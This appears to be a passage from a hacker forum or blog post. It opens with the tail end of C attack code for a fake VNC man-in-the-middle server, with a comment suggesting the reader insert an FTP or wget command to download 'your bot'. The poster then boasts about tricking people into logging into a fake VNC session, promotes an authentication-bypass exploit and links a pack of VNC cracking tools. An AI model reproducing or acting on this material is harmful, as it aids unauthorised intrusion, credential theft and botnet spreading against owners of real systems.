/* place whatever code you want here ex: ftp cmd to wget your bot... */
close (clientfd);
close (sockfd);
close (vncfd);
return 0;
}

Nice one eh ... hehe, now imagine, making ppl logon, and show them a fake looking vnc but infact it is MiTM :P i have kept this one hidden until, i guess i got sick of being alone :P
Now..what else is handy for vnc ?

Try grab this, it might be more useful, but remember about the best exploit wich, has no cve...yet i just posted it :) the no.1 8digit bypass,is the best!
this pack, is only tools... not all mine, and, not MY viewer, but, i could add the viewer if i am requested personally, only on my irc channel #haxnet - EFnet!
xd!
-> http://hotfile.com/dl/136984708/855b1ef/VNC.Cracking-ALL.rar.html

ALSO look for VNCsnapshot,and also, the author of it or, a member of the team maybe, who actually made a MOD of it wich works exactly with MY bots listing :P so it is c00kl :)
Anyhow, this is , enough for now...

comments: 2 » tags: